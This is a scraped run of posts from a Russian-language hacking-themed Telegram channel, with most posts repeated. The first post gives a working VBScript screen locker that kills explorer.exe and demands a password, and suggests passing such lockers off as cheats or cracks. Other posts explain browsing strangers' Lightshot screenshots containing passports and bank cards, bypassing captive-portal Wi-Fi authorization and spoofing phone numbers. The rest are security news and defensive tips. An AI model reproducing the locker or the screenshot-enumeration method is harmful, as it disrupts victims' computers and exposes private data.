Блокируем компьютер. Создаем собственный винлокер.
Давайте перенесемся на лет 5-6 назад и вспомним эру винлокеров.
На каждом форуме, сайте, треде, везде где можно прикрепить файл, люди скидывали винлок под видом читов или кряков.
Чем был вызван такой тренд не понятно, но было весело. Никто не хотел особо вредить. Мы тоже не будем.
Создадим за пару минут что-то типо винлокера, который будет блокировать рабочий стол и требовать ввести пароль.
Если мы предположим, что человек, который откроет наш винлок имеет пользовательский уровень владения пк и снимет наш винлок через диспетчер задач, то он молодец.
Вот только рабочий стол к нему не вернется и тут поможет только перезагрузка пк.
Открываем блокнот и вставляем туда код:
on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
do
password = InputBox ("Windows заблокирован редактором Cmd, капитулируйте")
Loop Until password = "12"
t.run"explorer"
Теперь сохраняем с расширением vbs (virus.vbs). На этом винлок готов. Пароль меняется в строке
Давайте перенесемся на лет 5-6 назад и вспомним эру винлокеров.
На каждом форуме, сайте, треде, везде где можно прикрепить файл, люди скидывали винлок под видом читов или кряков.
Чем был вызван такой тренд не понятно, но было весело. Никто не хотел особо вредить. Мы тоже не будем.
Создадим за пару минут что-то типо винлокера, который будет блокировать рабочий стол и требовать ввести пароль.
Если мы предположим, что человек, который откроет наш винлок имеет пользовательский уровень владения пк и снимет наш винлок через диспетчер задач, то он молодец.
Вот только рабочий стол к нему не вернется и тут поможет только перезагрузка пк.
Открываем блокнот и вставляем туда код:
on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
do
password = InputBox ("Windows заблокирован редактором Cmd, капитулируйте")
Loop Until password = "12"
t.run"explorer"
Теперь сохраняем с расширением vbs (virus.vbs). На этом винлок готов. Пароль меняется в строке
Loop Until password = "12"
Чтобы вернуть рабочий стол заходим в диспетчер задач > новая задача > пишем explorer.exeThis media is not supported in your browser
VIEW IN TELEGRAM
Расовые стереотипы добрались и до ИБ - сообщества
Вице-президент Google по инженерии Дэвид Кляйдермахер просит отказаться ИБ - сообщество
от терминов white hat и в особенности black hat из-за расовых стереотипов.
Обсуждение вопроса началось поздно ночью 3 июля, когда ответственный за Android Security и Google Play Store вице-президент Google по инженерии Дэвид Кляйдермахер (David Kleidermacher) отказался от своего запланированного выступление на конференции Black Hat USA 2020, которая должна пройти в следующем месяце. Объявив о своем решении, Кляйдермахер также призвал ИБ-сообщество рассмотреть
возможность замены терминов black hat, white hat и man-in-the-middle («человек посередине») нейтральными альтернативами.
Знаете, возможно мне сложно понять позицию Дэвида, в силу того, что я вырос на территории СНГ и с расизмом не особо сталкивался, но это уже перебор. Если они реально заменят термин "человек посередине", то как дальше жить то??🤐
Вице-президент Google по инженерии Дэвид Кляйдермахер просит отказаться ИБ - сообщество
от терминов white hat и в особенности black hat из-за расовых стереотипов.
Обсуждение вопроса началось поздно ночью 3 июля, когда ответственный за Android Security и Google Play Store вице-президент Google по инженерии Дэвид Кляйдермахер (David Kleidermacher) отказался от своего запланированного выступление на конференции Black Hat USA 2020, которая должна пройти в следующем месяце. Объявив о своем решении, Кляйдермахер также призвал ИБ-сообщество рассмотреть
возможность замены терминов black hat, white hat и man-in-the-middle («человек посередине») нейтральными альтернативами.
Знаете, возможно мне сложно понять позицию Дэвида, в силу того, что я вырос на территории СНГ и с расизмом не особо сталкивался, но это уже перебор. Если они реально заменят термин "человек посередине", то как дальше жить то??🤐
This media is not supported in your browser
VIEW IN TELEGRAM
Узнаем, собирают ли по нам информацию в интернете
Приветствую читателей Cmd!
Думаю многим интересно узнать, пытаются ли как-то найти вашу личную информацию в интернете.
Номер телефона, адрес проживания и много другой личной информации. За всем этим можно активно наблюдать с помощью сервиса Google alerts.
Данный проект от Google позволяет отслеживать любой поисковой запрос. Конечно как и в любом шпионе сразу не кто ничего не покажет, так как данные не собираются постоянно а только по запросу, когда вы создали задание собирать статистику.
Чтобы получать статистику по запросу или запросам, нужна почта на gmail.com аккаунт. После чего переходите на сервис Оповещения . Далее вы можете вести в строке в самом верху свой поисковый запрос или оставить из рекомендации.
То есть, вы можете создать статистику абсолютно по любым запросам и получать по ним информацию на вашу почту. Сервис очень хорош в плане отслеживания сбора и деанона вашей персональной информации.
https://www.google.ru/alerts
Приветствую читателей Cmd!
Думаю многим интересно узнать, пытаются ли как-то найти вашу личную информацию в интернете.
Номер телефона, адрес проживания и много другой личной информации. За всем этим можно активно наблюдать с помощью сервиса Google alerts.
Данный проект от Google позволяет отслеживать любой поисковой запрос. Конечно как и в любом шпионе сразу не кто ничего не покажет, так как данные не собираются постоянно а только по запросу, когда вы создали задание собирать статистику.
Чтобы получать статистику по запросу или запросам, нужна почта на gmail.com аккаунт. После чего переходите на сервис Оповещения . Далее вы можете вести в строке в самом верху свой поисковый запрос или оставить из рекомендации.
То есть, вы можете создать статистику абсолютно по любым запросам и получать по ним информацию на вашу почту. Сервис очень хорош в плане отслеживания сбора и деанона вашей персональной информации.
https://www.google.ru/alerts
This media is not supported in your browser
VIEW IN TELEGRAM
Тотальная слежка за coivd больными
Власти будут отслеживать местоположение заразившегося и составят список тех, кто находился
рядом с заболевшим и общался с ним по мобильной связи последние 14 дней
Минкомсвязь разработала регламент отслеживания контактов заразившихся коронавирусом на основе геолокации и данных мобильных операторов.
В документе отмечается, что за основу будут браться данные Минздрава о номере телефона больного COVID-19. После этого специальные алгоритмы составят список людей, которые находились вместе с больным, а также тех, кто контактировал с зараженным
посредством мобильной связи.
Не особо догоняю, как будет работать такая система и в чем ее смысл. То есть, если я живу в одном районе и связываюсь по мобильнику со своим другом, которые болеет covid'ом, то попадаю в список риска? У такой системы куча нюансов и статистика будет максимально не точной, но это лишь мое мнение.
Хотя итак понятно, зачем все это.
Власти будут отслеживать местоположение заразившегося и составят список тех, кто находился
рядом с заболевшим и общался с ним по мобильной связи последние 14 дней
Минкомсвязь разработала регламент отслеживания контактов заразившихся коронавирусом на основе геолокации и данных мобильных операторов.
В документе отмечается, что за основу будут браться данные Минздрава о номере телефона больного COVID-19. После этого специальные алгоритмы составят список людей, которые находились вместе с больным, а также тех, кто контактировал с зараженным
посредством мобильной связи.
Не особо догоняю, как будет работать такая система и в чем ее смысл. То есть, если я живу в одном районе и связываюсь по мобильнику со своим другом, которые болеет covid'ом, то попадаю в список риска? У такой системы куча нюансов и статистика будет максимально не точной, но это лишь мое мнение.
Хотя итак понятно, зачем все это.
Обманываем сайты. Подделываем куки
Всю нашу информацию веб-сайты держат в хранилище нашего браузера.
Так называемые Интернета «куки» - это текстовые файлы небольшого объема со служебной информацией для браузера. Иными словами сервер
обменивается с веб-обозревателем на ПК или мобильном гаджете данными о сайтах, которые посещал пользователь. Информация в куках может быть самой разной. Например, часто в таких файлах хранится статистика посещений, логин и пароль от сайтов или сервисов, индивидуальные
настройки пользователя (регион, дизайн оформления и прочее).
Расширение EditThisCookie позволяет добавлять, удалять, изменять, искать, защищать и блокировать cookie.
Расширение очень полезно при работе с большим количеством аккаунтов. Вам не нужно будет проходить аутентификацию, а просто быстро подменить куки.
Функция редактирования позволяет лишать различные сервисы показывать вам персонализируемую рекламу и полностью стирает ваш идентификатор.
Это лишь основные функции, которые будут полезны как обывателю, так и профи. По желанию, в расширении можно найти еще больше полезных функций.
Google Chrome: https://goo.su/1my6
Opera: https://goo.su/1MY6
Всю нашу информацию веб-сайты держат в хранилище нашего браузера.
Так называемые Интернета «куки» - это текстовые файлы небольшого объема со служебной информацией для браузера. Иными словами сервер
обменивается с веб-обозревателем на ПК или мобильном гаджете данными о сайтах, которые посещал пользователь. Информация в куках может быть самой разной. Например, часто в таких файлах хранится статистика посещений, логин и пароль от сайтов или сервисов, индивидуальные
настройки пользователя (регион, дизайн оформления и прочее).
Расширение EditThisCookie позволяет добавлять, удалять, изменять, искать, защищать и блокировать cookie.
Расширение очень полезно при работе с большим количеством аккаунтов. Вам не нужно будет проходить аутентификацию, а просто быстро подменить куки.
Функция редактирования позволяет лишать различные сервисы показывать вам персонализируемую рекламу и полностью стирает ваш идентификатор.
Это лишь основные функции, которые будут полезны как обывателю, так и профи. По желанию, в расширении можно найти еще больше полезных функций.
Google Chrome: https://goo.su/1my6
Opera: https://goo.su/1MY6
Казаха обвинили в продаже краденных данных крупных ИБ-компаний
Министерство юстиции США предъявило обвинение киберпреступнику, использующему псевдоним Fxmsp, который продавал доступ к компьютерным системам более чем трех сотен организаций по всему миру.
Согласно обвинительному заключению, подозреваемый вместе с сообщниками получил доступ к частным сетям посредством фишинговых атак и хищения паролей с помощью брутфорс-атак с открытых RDP-серверов. Взломав сеть, Fxmsp предположительно устанавливал вредоносное ПО для хищения паролей и трояны для удаленного доступа (RAT) с целью сбора учетных данных и обеспечения персистентности на системе.
В мае 2019 года Fxmsp выставил на продажу исходный код антивирусных программ и похищенные данные крупнейших ИБ-компаний США. По словам киберпреступника, он взломал системы компаний Symantec, McAfee и Trend Micro, а также получил доступ к более чем 30 ТБ данных последней.
Нормально так крутился парень, но человеческий фактор дал о себе знать. P.S микро-схема его действий на фото ниже👇
Министерство юстиции США предъявило обвинение киберпреступнику, использующему псевдоним Fxmsp, который продавал доступ к компьютерным системам более чем трех сотен организаций по всему миру.
Согласно обвинительному заключению, подозреваемый вместе с сообщниками получил доступ к частным сетям посредством фишинговых атак и хищения паролей с помощью брутфорс-атак с открытых RDP-серверов. Взломав сеть, Fxmsp предположительно устанавливал вредоносное ПО для хищения паролей и трояны для удаленного доступа (RAT) с целью сбора учетных данных и обеспечения персистентности на системе.
В мае 2019 года Fxmsp выставил на продажу исходный код антивирусных программ и похищенные данные крупнейших ИБ-компаний США. По словам киберпреступника, он взломал системы компаний Symantec, McAfee и Trend Micro, а также получил доступ к более чем 30 ТБ данных последней.
Нормально так крутился парень, но человеческий фактор дал о себе знать. P.S микро-схема его действий на фото ниже👇
This media is not supported in your browser
VIEW IN TELEGRAM
Сужаем поиск цели до предела
Приветствую читателей Cmd!
Сегодня поговорим о поисковике BoardReader, который позволяет сузить поле поиска до социальных площадок. Благодаря специальным фильтрам вы можете быстро находить посты и комментарии пользователей, которые соответствуют
вашим критериям: языку, дате публикации и названию сайта.
В плане OSINT'a сервис очень хорош. Если вы умеете собирать и анализировать собранную информацию, то BoarReader станет вашей правой рукой.
Также поисковик является отличным инструментом для SEO'шников . Вы можете анализировать, как реагируют массы пользователей сети на то или иное событие.
https://boardreader.com/
Приветствую читателей Cmd!
Сегодня поговорим о поисковике BoardReader, который позволяет сузить поле поиска до социальных площадок. Благодаря специальным фильтрам вы можете быстро находить посты и комментарии пользователей, которые соответствуют
вашим критериям: языку, дате публикации и названию сайта.
В плане OSINT'a сервис очень хорош. Если вы умеете собирать и анализировать собранную информацию, то BoarReader станет вашей правой рукой.
Также поисковик является отличным инструментом для SEO'шников . Вы можете анализировать, как реагируют массы пользователей сети на то или иное событие.
https://boardreader.com/
This media is not supported in your browser
VIEW IN TELEGRAM
Киберпреступники украли 500 тысяч евро путем угона SIM-карт
Испанская полиция задержала почти сто человек по обвинению в хищении полумиллиона евро при помощи интернет-мошенничества,
Для хищения денег использовался sim-свопинг - вид мошенничества, при котором преступник, узнав номер телефона жертвы, перевыпускает ее сим-карту, чтобы получить полный доступ к банковскому счету.
Операция проводилась в различных регионах страны, задержаны 94 человека, которым могут быть предъявлены обвинения в мошенничестве, отмывании денег, членстве в преступной группировке, подделке документов. Сумма похищенного составляет 504,8 тысячи евро, у одной из жертв с банковского счета были украдены 240 тысяч.
Вот это я понимаю реальная дырка в системе. Симка - это доступ ко всем ресурсам и аккаунтам пользователя, но при этом ее защита нулевая.
Почему в 2020 году люди нанимают дропов за 1 тыс рублей, в фотошопе рисуют доки и бегут перевыпускать симкарты?
Уважаемые сотовые операторы, остановите это безумие, плиз.
Испанская полиция задержала почти сто человек по обвинению в хищении полумиллиона евро при помощи интернет-мошенничества,
Для хищения денег использовался sim-свопинг - вид мошенничества, при котором преступник, узнав номер телефона жертвы, перевыпускает ее сим-карту, чтобы получить полный доступ к банковскому счету.
Операция проводилась в различных регионах страны, задержаны 94 человека, которым могут быть предъявлены обвинения в мошенничестве, отмывании денег, членстве в преступной группировке, подделке документов. Сумма похищенного составляет 504,8 тысячи евро, у одной из жертв с банковского счета были украдены 240 тысяч.
Вот это я понимаю реальная дырка в системе. Симка - это доступ ко всем ресурсам и аккаунтам пользователя, но при этом ее защита нулевая.
Почему в 2020 году люди нанимают дропов за 1 тыс рублей, в фотошопе рисуют доки и бегут перевыпускать симкарты?
Уважаемые сотовые операторы, остановите это безумие, плиз.
То что ты хотел, но забыл прочитать
Приветствую читателей Cmd!
Сегодня решил сделать подборку наших постов, которые вы должны обязательно прочитать и попробовать применить.
Знаю, что у меня очень активная аудитория и все мои посты вы охотно читаете, поэтому это подборка больше для наших новичков
1. Прокачка навыков СИ до уровня БОГ
2. Как найти пароли всех подключенных сетей Wi-Fi с помощью Cmd
3. Прячем файлы в картинке через Cmd
4. Пробуем скрытые возможности Смартфона
5. Сбрасываем или меняем пароль Windows, не зная предыдущего
‼Не забудь подписаться, дальше будет интереснее.‼
Приветствую читателей Cmd!
Сегодня решил сделать подборку наших постов, которые вы должны обязательно прочитать и попробовать применить.
Знаю, что у меня очень активная аудитория и все мои посты вы охотно читаете, поэтому это подборка больше для наших новичков
1. Прокачка навыков СИ до уровня БОГ
2. Как найти пароли всех подключенных сетей Wi-Fi с помощью Cmd
3. Прячем файлы в картинке через Cmd
4. Пробуем скрытые возможности Смартфона
5. Сбрасываем или меняем пароль Windows, не зная предыдущего
‼Не забудь подписаться, дальше будет интереснее.‼
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Создаем тысячи Gmail почт за 5 секунд
Приветствую читателей Cmd
Думаю многие знают про фичу Gmail, которая позволяет регистрировать тысячи аккаунтов имея всего одну почту.
Или же вам нужно просто зарегистрировать аккаунт на сайте, но создавать новый ящик желания нет.
Что же эта за фича такая? Дело в том, что точка является уникальным символом в почтовом адресе,т.е.
cmdtelegram@gmail.com и cmd.telegram@gmail.com являются разным емейлами,
но гугл и различные сайты почему то так не считают и если мы отправим сообщение на cmd.telegram@gmail.com,
оно будет переадресовано cmdtelegram, то есть гугл не учитывает точку как уникальный символ и переадресовывает сообщение на email без точки.
Но самому создавать тысячи уникальных символов для почт трудновато, поэтому можно воспользоваться сайтом thebot.net
Чем больше символов в вашем email, тем больше можно создать псевдопочт. Также все это дело можно сохранить и оптимизировать под себя.
https://thebot.net/api/gmail/
Приветствую читателей Cmd
Думаю многие знают про фичу Gmail, которая позволяет регистрировать тысячи аккаунтов имея всего одну почту.
Или же вам нужно просто зарегистрировать аккаунт на сайте, но создавать новый ящик желания нет.
Что же эта за фича такая? Дело в том, что точка является уникальным символом в почтовом адресе,т.е.
cmdtelegram@gmail.com и cmd.telegram@gmail.com являются разным емейлами,
но гугл и различные сайты почему то так не считают и если мы отправим сообщение на cmd.telegram@gmail.com,
оно будет переадресовано cmdtelegram, то есть гугл не учитывает точку как уникальный символ и переадресовывает сообщение на email без точки.
Но самому создавать тысячи уникальных символов для почт трудновато, поэтому можно воспользоваться сайтом thebot.net
Чем больше символов в вашем email, тем больше можно создать псевдопочт. Также все это дело можно сохранить и оптимизировать под себя.
https://thebot.net/api/gmail/
This media is not supported in your browser
VIEW IN TELEGRAM
План капкан. Узнаем есть ли вирус на флешке
Бывает ситуация, когда приходится вставлять свою флешку в чужой компьютер. Это совсем не обязательно компьютер друзей-приятелей, сейчас можно подцепить вирус и в студии фотопечати, и даже в налоговой.
Суть метода заключается в создании иконки для флешки со специальным файлом. Если на флешку попадет вирус то он перепишет файл и наша иконка пропадет, тем самым мы поймем,что поймали вирус.
1. Создаем на флешке текстовый документ, затем переименовываем его в autorun.inf.
2. Далее находим иконку в интернете или создаем свою с размером 64х64. Скачать можно тут, сделать иконку тут
3. Открываем файл autorun.inf через блокнот и пишем:
[autorun]
icon=1.ico
где вместо "1" должно быть написано имя выбранной вами иконки. Сохраняем и закрываем autorun.inf
4. Теперь копируем иконку на флешку
5. Закрываем флешку, вытаскиваем и вставляем обратно.
Если на вашу флешку попадет вирус, то он перепишет autorun.inf и ваша иконка не будет отображаться - это и будет признаком вируса
Бывает ситуация, когда приходится вставлять свою флешку в чужой компьютер. Это совсем не обязательно компьютер друзей-приятелей, сейчас можно подцепить вирус и в студии фотопечати, и даже в налоговой.
Суть метода заключается в создании иконки для флешки со специальным файлом. Если на флешку попадет вирус то он перепишет файл и наша иконка пропадет, тем самым мы поймем,что поймали вирус.
1. Создаем на флешке текстовый документ, затем переименовываем его в autorun.inf.
2. Далее находим иконку в интернете или создаем свою с размером 64х64. Скачать можно тут, сделать иконку тут
3. Открываем файл autorun.inf через блокнот и пишем:
[autorun]
icon=1.ico
где вместо "1" должно быть написано имя выбранной вами иконки. Сохраняем и закрываем autorun.inf
4. Теперь копируем иконку на флешку
5. Закрываем флешку, вытаскиваем и вставляем обратно.
Если на вашу флешку попадет вирус, то он перепишет autorun.inf и ваша иконка не будет отображаться - это и будет признаком вируса
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
Почему TikTok запрещают по всему миру?
Мы уже делали пост про TikTok, в котором описали все недостатки приложения в плане безопасности.
Сегодня хотелось бы поставить точку в этом вопросе. В этом нам поможет опрос, который провели ребята из SecurityLab.
Они опросили 1455 квалифицированных IT специалистов с целью узнать, что, по их мнению, является истинной причиной блокировки TikTok.
Как показал опрос, большинство респондентов (40%) согласны с Anonymous в том, что приложение шпионит за пользователями. 37% участников считают TikTok кибероружием в руках китайских спецслужб. Однако 38% респондентов уверены, что истинная причина блокировки заключается совсем в другом, а именно – в конкуренции другим лидерам рынка. Только 7% опроса поддерживают точку зрения Трампа и считают запрет приложения местью Китаю за коронавирус.
Вообще я со всеми понемножку согласен и истину мы вряд ли узнаем. Утверждать, что эти версии правда мы не можем, но предполагать и делать выводы - еще как.
Мы уже делали пост про TikTok, в котором описали все недостатки приложения в плане безопасности.
Сегодня хотелось бы поставить точку в этом вопросе. В этом нам поможет опрос, который провели ребята из SecurityLab.
Они опросили 1455 квалифицированных IT специалистов с целью узнать, что, по их мнению, является истинной причиной блокировки TikTok.
Как показал опрос, большинство респондентов (40%) согласны с Anonymous в том, что приложение шпионит за пользователями. 37% участников считают TikTok кибероружием в руках китайских спецслужб. Однако 38% респондентов уверены, что истинная причина блокировки заключается совсем в другом, а именно – в конкуренции другим лидерам рынка. Только 7% опроса поддерживают точку зрения Трампа и считают запрет приложения местью Китаю за коронавирус.
Вообще я со всеми понемножку согласен и истину мы вряд ли узнаем. Утверждать, что эти версии правда мы не можем, но предполагать и делать выводы - еще как.
Я знаю что ты скачал. Как скачать и раздать торрент безопаснее и анонимнее
Людей, которые не пользовались торрентами попросту нет. Но мало кто знает, что зная IP-адрес, можно выяснить, какие файлы пользователь качал через торренты.
По своей архитектуре, пиринговые сети не могут скрывать IP-адреса пользователей. Эту информацию клиенты должны передавать друг другу, чтобы устанавливать P2P-соединения и создавать раздачи.
Сервис iknowwhatyoudownload.com анализирует пиринговые сети и показывает список из фильмов, музыки и другого контента, скачанного с любого IP-адреса. Вы можете проверить это, вписав свой айпишник.
Как же можно скачивать и раздавать торренты безопаснее? Для этого был разработан клиент Tribler. Tribler — полностью анонимная версия BitTorrent, которую невозможно отключить.Новейшая версия Tribler работает на технологии скопированной из Tor, но не на базе самой сети Tor. Это позволяет пользователям обмениваться файлами анонимно. С точки зрения провайдера узнать чем обмениваются участники Tribler невозможно, как невозможно узнать и куда передаются данные, поскольку информация будет проходить через несколько точек передачи.
Исходный код: https://github.com/Tribler/tribler
Установить: https://www.tribler.org/
Людей, которые не пользовались торрентами попросту нет. Но мало кто знает, что зная IP-адрес, можно выяснить, какие файлы пользователь качал через торренты.
По своей архитектуре, пиринговые сети не могут скрывать IP-адреса пользователей. Эту информацию клиенты должны передавать друг другу, чтобы устанавливать P2P-соединения и создавать раздачи.
Сервис iknowwhatyoudownload.com анализирует пиринговые сети и показывает список из фильмов, музыки и другого контента, скачанного с любого IP-адреса. Вы можете проверить это, вписав свой айпишник.
Как же можно скачивать и раздавать торренты безопаснее? Для этого был разработан клиент Tribler. Tribler — полностью анонимная версия BitTorrent, которую невозможно отключить.Новейшая версия Tribler работает на технологии скопированной из Tor, но не на базе самой сети Tor. Это позволяет пользователям обмениваться файлами анонимно. С точки зрения провайдера узнать чем обмениваются участники Tribler невозможно, как невозможно узнать и куда передаются данные, поскольку информация будет проходить через несколько точек передачи.
Исходный код: https://github.com/Tribler/tribler
Установить: https://www.tribler.org/
Как хакнуть мозг? Краткий пример социальной инженерии
Сегодня социальная инженерия стала неотъемлемой частью тестов на проникновение. Их проведение заказывают частным фирмам крупные компании и государственные организации, каждый раз увеличивая число седых волос у руководителей подразделений. По их результатам устраивают тренинги для руководящего состава и увольняют наиболее провинившихся рядовых сотрудников. Однако ситуация от этого принципиально не меняется.
Психолог Э. Лангер провел очень простой эксперимент. Он заставлял одного из испытуемых подойти к очереди и пройти без очереди. И выяснил, что почти 90 % людей разрешают пройти вам без очереди, если вы скажете примерно так:
— Разрешите мне пройти без очереди, потому что я очень спешу.
А вот если попросите так, — "Разрешите мне пройти без очереди", — то количество желающих вам уступить уменьшится вдвое.
Первоначально Лангер думал, что в первом случае уступают из-за того, что испытуемый аргументировал свою просьбу тем, что он очень спешит. Однако потом, проведя третий эксперимент, он выяснил, что это не так. А в третьем эксперименте испытуемый сказал так:
— Разрешите мне пройти без очереди, потому что мне очень надо.
И опять количество разрешивших было около 90 %. На основании чего Лангер сделал вывод, что ключевое слово здесь "потому что". Таким образом, людям можно указать любую причину, и они уступят. Потому что люди хотят знать причину того, почему они делают то или иное действие, т. е. слово "потому что" выступало сигналом для запуска у людей программы уступчивости.
Пример из книги «Социальная инженерия и социальные хакеры».
Сегодня социальная инженерия стала неотъемлемой частью тестов на проникновение. Их проведение заказывают частным фирмам крупные компании и государственные организации, каждый раз увеличивая число седых волос у руководителей подразделений. По их результатам устраивают тренинги для руководящего состава и увольняют наиболее провинившихся рядовых сотрудников. Однако ситуация от этого принципиально не меняется.
Психолог Э. Лангер провел очень простой эксперимент. Он заставлял одного из испытуемых подойти к очереди и пройти без очереди. И выяснил, что почти 90 % людей разрешают пройти вам без очереди, если вы скажете примерно так:
— Разрешите мне пройти без очереди, потому что я очень спешу.
А вот если попросите так, — "Разрешите мне пройти без очереди", — то количество желающих вам уступить уменьшится вдвое.
Первоначально Лангер думал, что в первом случае уступают из-за того, что испытуемый аргументировал свою просьбу тем, что он очень спешит. Однако потом, проведя третий эксперимент, он выяснил, что это не так. А в третьем эксперименте испытуемый сказал так:
— Разрешите мне пройти без очереди, потому что мне очень надо.
И опять количество разрешивших было около 90 %. На основании чего Лангер сделал вывод, что ключевое слово здесь "потому что". Таким образом, людям можно указать любую причину, и они уступят. Потому что люди хотят знать причину того, почему они делают то или иное действие, т. е. слово "потому что" выступало сигналом для запуска у людей программы уступчивости.
Пример из книги «Социальная инженерия и социальные хакеры».
Как хакерам удалось взломать Twitter? Последствия самого масштабного кибершпионажа
Все уже в курсе крупного взлома соц. сети Twitter. Но реальная причина стала известна несколько часов назад.
Крупномасштабная атака на Twitter с целью кражи биткоинов стала возможной из-за наличия у некоторых сотрудников компании широких полномочий для управления аккаунтами пользователей.
«Мы обнаружили, как нам представляется, скоординированную атаку с применением социальной инженерии на некоторых наших сотрудников с доступом ко внутренним системам и инструментам», – сообщила служба поддержки Twitter.
Какой именно метод социальной инженерии был применен не сообщается. Возможно преступники вели даже личный контакт с сотрудниками.
Что же сейчас будет с компанией? Тут гадать не нужно. Акции на ценные бумаги уже подешевели на 5 процентов. Доверие к Twitter пропало не только из-за проникновения в систему. Они ведь не сразу сообщили и остановили атаку, а только через несколько часов, что очень странно.
Такой удар Twitter этим преступнчикам точно не простит. Думаю, они сделают все, что в их силах для поимки взломщиков. Будем следить за развитием событий!
P.S Возможная админ-панель Twitter'a, которую слили преступники👇
Все уже в курсе крупного взлома соц. сети Twitter. Но реальная причина стала известна несколько часов назад.
Крупномасштабная атака на Twitter с целью кражи биткоинов стала возможной из-за наличия у некоторых сотрудников компании широких полномочий для управления аккаунтами пользователей.
«Мы обнаружили, как нам представляется, скоординированную атаку с применением социальной инженерии на некоторых наших сотрудников с доступом ко внутренним системам и инструментам», – сообщила служба поддержки Twitter.
Какой именно метод социальной инженерии был применен не сообщается. Возможно преступники вели даже личный контакт с сотрудниками.
Что же сейчас будет с компанией? Тут гадать не нужно. Акции на ценные бумаги уже подешевели на 5 процентов. Доверие к Twitter пропало не только из-за проникновения в систему. Они ведь не сразу сообщили и остановили атаку, а только через несколько часов, что очень странно.
Такой удар Twitter этим преступнчикам точно не простит. Думаю, они сделают все, что в их силах для поимки взломщиков. Будем следить за развитием событий!
P.S Возможная админ-панель Twitter'a, которую слили преступники👇
This media is not supported in your browser
VIEW IN TELEGRAM
Прокачиваем безопасность Windows
Приветствую читателей cmd.
Сегодня хочу дать вам пару советов по безопасности вашей системы.
Без установки дополнительных программ и утилит. Просто базовые, но довольно полезные инструменты, которыми мало кто пользуется.
1. Блокируем компьютер сочетанием клавиш
Нажмите Win + L чтобы закрыть ваше рабочее пространство экраном блокировки. Полезная фича, которая отгородит ваш компьютер от ваших друзей, коллег, родственников в тот момент, когда вы отошли от пк.
2. Ставим PIN-code
Это не пароль, а именно pin-code! Его добавили в ОС Windows 10 и он намного безопаснее обычного пароля.
Дело в том, что пин-код привязан к вашему устройству. Злоумышленник, получивший доступ к паролю, может войти в учетную запись с любого устройства, но в случае кражи ПИН-кода вход в учетную запись будет невозможен без доступа к соответствующему устройству.
Также пин код может быть запрошен для внесение изменений в компьютер или для установки программ, тем самым отсекая некоторые виды вредоносов.
Приветствую читателей cmd.
Сегодня хочу дать вам пару советов по безопасности вашей системы.
Без установки дополнительных программ и утилит. Просто базовые, но довольно полезные инструменты, которыми мало кто пользуется.
1. Блокируем компьютер сочетанием клавиш
Нажмите Win + L чтобы закрыть ваше рабочее пространство экраном блокировки. Полезная фича, которая отгородит ваш компьютер от ваших друзей, коллег, родственников в тот момент, когда вы отошли от пк.
2. Ставим PIN-code
Это не пароль, а именно pin-code! Его добавили в ОС Windows 10 и он намного безопаснее обычного пароля.
Дело в том, что пин-код привязан к вашему устройству. Злоумышленник, получивший доступ к паролю, может войти в учетную запись с любого устройства, но в случае кражи ПИН-кода вход в учетную запись будет невозможен без доступа к соответствующему устройству.
Также пин код может быть запрошен для внесение изменений в компьютер или для установки программ, тем самым отсекая некоторые виды вредоносов.
This media is not supported in your browser
VIEW IN TELEGRAM
Смотрим чужие скриншоты
Сегодня хочу осветить такую проблему как, скриншоты, точнее, сервис Lightshot, который может показать чужие скриншоты.
Что можно там найти? Абсолютно все. Скрины паспортов, дампы, банковские карты, приватные фото, админки и много другой информации.
Как находить чужие скриншоты? Например, возьмем ссылку https://prnt.sc/1npf14 (чей-то скриншот) и после слеша(/) у нас стоят 6 символов состоящие из цифр и букв. Заменяем либо один символ либо все, чтобы получить другой скриншот. Вот и вся система поиска чужих скриншотов.
Как все это дело оптимизировать? В конце поста прикреплю ссылку на статью в telegraph. Там лежит скрипт, который упрощает поиск.
Также для заядлых нетсталкеров скинул пару парсеров с github. Оптимизация
Сегодня хочу осветить такую проблему как, скриншоты, точнее, сервис Lightshot, который может показать чужие скриншоты.
Что можно там найти? Абсолютно все. Скрины паспортов, дампы, банковские карты, приватные фото, админки и много другой информации.
Как находить чужие скриншоты? Например, возьмем ссылку https://prnt.sc/1npf14 (чей-то скриншот) и после слеша(/) у нас стоят 6 символов состоящие из цифр и букв. Заменяем либо один символ либо все, чтобы получить другой скриншот. Вот и вся система поиска чужих скриншотов.
Как все это дело оптимизировать? В конце поста прикреплю ссылку на статью в telegraph. Там лежит скрипт, который упрощает поиск.
Также для заядлых нетсталкеров скинул пару парсеров с github. Оптимизация
Обходим авторизацию в общественных Wi-Fi точках
Приветствую читателей Cmd.
Все сталкивались со всплывающим окном при попытке подключится к WI-FI сети в каком-нибудь заведении.
Мало кто знает, что это необходимая процедура для идентификации пользователей во многих странах.
Также вводя свой номер вы рискуете попасть под удар спама. Ваши данные вполне могут продать другим компаниям с целью впарить вам свои услуги.
❗️Данный материал для ознакомления и лишь указывает на дыры в системе безопасности❗️
Как обойти авторизацию? Попробуем 3 способа.
1️⃣
Подключаемся к Wi-Fi.
Открываем браузер и переходим на любой сайт. Если вас перекинуло на страницу авторизации, то пока что выходим из браузера.
Проверяем работают ли приложения, WhatsApp, Skype, Telegram или другие приложения.
Если все работает, то авторизацию в браузере можно обойти, для этого потребуется заменить DNS точки.
Переходим в настройки Wi-Fi, находим нужную сеть, нажимаем и удерживаем.
В выпадающем списке выбираем «Изменить сеть», листаем в самый низ и ставим чекбокс «дополнительно».
В пункте «Настройки IPv4» меняем DHCP на «пользовательские».
Меняем DNS 1 и DNS 2 на "8.8.8.8" и "8.8.4.4".
Нажимаем «Сохранить».
2️⃣
Используем бесплатные виртуальные номера > https://onlinesim.ru/
3️⃣
Пользуемся программами для подмены номера. Данный способ необходим только в том случаи, если для авторизации необходимо совершить звонок.
Приветствую читателей Cmd.
Все сталкивались со всплывающим окном при попытке подключится к WI-FI сети в каком-нибудь заведении.
Мало кто знает, что это необходимая процедура для идентификации пользователей во многих странах.
Также вводя свой номер вы рискуете попасть под удар спама. Ваши данные вполне могут продать другим компаниям с целью впарить вам свои услуги.
❗️Данный материал для ознакомления и лишь указывает на дыры в системе безопасности❗️
Как обойти авторизацию? Попробуем 3 способа.
1️⃣
Подключаемся к Wi-Fi.
Открываем браузер и переходим на любой сайт. Если вас перекинуло на страницу авторизации, то пока что выходим из браузера.
